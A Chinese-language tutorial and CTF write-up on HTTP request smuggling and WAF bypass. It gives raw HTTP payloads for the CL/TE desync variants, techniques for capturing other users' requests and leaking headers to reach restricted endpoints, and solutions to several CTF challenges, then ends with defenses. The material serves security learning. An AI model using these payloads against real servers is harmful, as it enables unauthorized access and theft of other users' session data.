HTTP请求走私与WAF绕过技术详解

0x00 基本概念

HTTP请求走私(HTTP Request Smuggling)是一种利用前端服务器(如代理服务器)与后端服务器对HTTP请求解析差异的安全漏洞。攻击者通过精心构造的HTTP请求包，绕过前端服务器的安全策略直接访问后端服务器。

关键特性

• Keep-Alive: HTTP/1.1默认特性，保持TCP连接不关闭，重用连接
• Pipeline: 客户端可以连续发送多个请求而不需等待响应

0x01 漏洞成因

主要由于服务器对以下头部处理不一致：

1. Content-Length (CL): 指定请求体长度
2. Transfer-Encoding (TE): 指定传输编码方式，特别是chunked编码

0x02 常见走私类型

1. CL不为0

场景: 前端允许GET带请求体，后端不允许

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 43\r\n

GET /admin HTTP/1.1\r\n
Host: example.com\r\n
\r\n

2. CL CL

场景: 前后端对多个CL头处理不一致

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n

12345\r\n
a

3. CL TE

场景: 前端处理CL，后端处理TE

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 10\r\n
Transfer-Encoding:chunked\r\n
\r\n
0\r\n
\r\n
A\r\n
\r\n

4. TE CL

场景: 前端处理TE，后端处理CL

POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

12
WPOST / HTTP/1.1

0

5. TE TE

场景: 通过混淆TE头使前后端解析不一致

POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding:chunked
Transfer-Encoding:cow

5c
WPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

0x03 实际应用案例

1. 获取其他用户请求

构造CL TE请求，将恶意请求滞留在缓存区，拼接后续用户请求：

POST / HTTP/1.1
Host: example.com
Content-Length: 333
Transfer-Encoding:chunked
Content-Type: application/x-www-form-urlencoded

0

POST /post/comment HTTP/1.1
Host: example.com
Content-Length: 700
Content-Type: application/x-www-form-urlencoded

csrf=xxx&postId=6&comment=spring

2. 泄露请求头实现未授权访问

POST / HTTP/1.1
Host: example.com
Content-Length: 77
Transfer-Encoding:chunked

0

POST / HTTP/1.1
Content-Length:70
Connection:close

search=111

0x04 CTF实战案例

案例1: GKCTF2021 hackme

利用Nginx <1.17.7走私漏洞访问Weblogic Console:

GET /test HTTP/1.1
Host: target.com
Content-Length: 0
Transfer-Encoding: chunked

GET /console/login/LoginForm.jsp HTTP/1.1
Host: weblogic

案例2: RCTF2019 easy calc

常规WAF绕过:

calc.php? num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

走私绕过:

POST /calc.php HTTP/1.1
Host: target.com
Content-Length: 50
Content-Length: 49

num=readfile("/f1agg");//

案例3: ISCC2022 让我康康!

利用Gunicorn<20.0.4走私漏洞:

POST / HTTP/1.1
Host: target.com
Content-Length: 149
Sec-Websocket-Key1:x

xxxxxxxxPOST / HTTP/1.1
Host:127.0.0.1
secr3t_ip: 127.0.0.1
Content-Length: 150

search=abc

POST / HTTP/1.1
Content-Length: 14

search=111

0x05 防御措施

1. 禁用代理服务器与后端服务器的TCP连接重用
2. 对所有HTTP请求头进行规范化处理
3. 前端服务器应拒绝模棱两可的请求
4. 确保所有服务器使用相同HTTP解析器
5. 禁用后端直接连接互联网

0x06 参考资源

1. HTTP Desync Attacks: Smashing into the Cell Next Door
2. HTTP Request Smuggling
3. Gunicorn Request Smuggling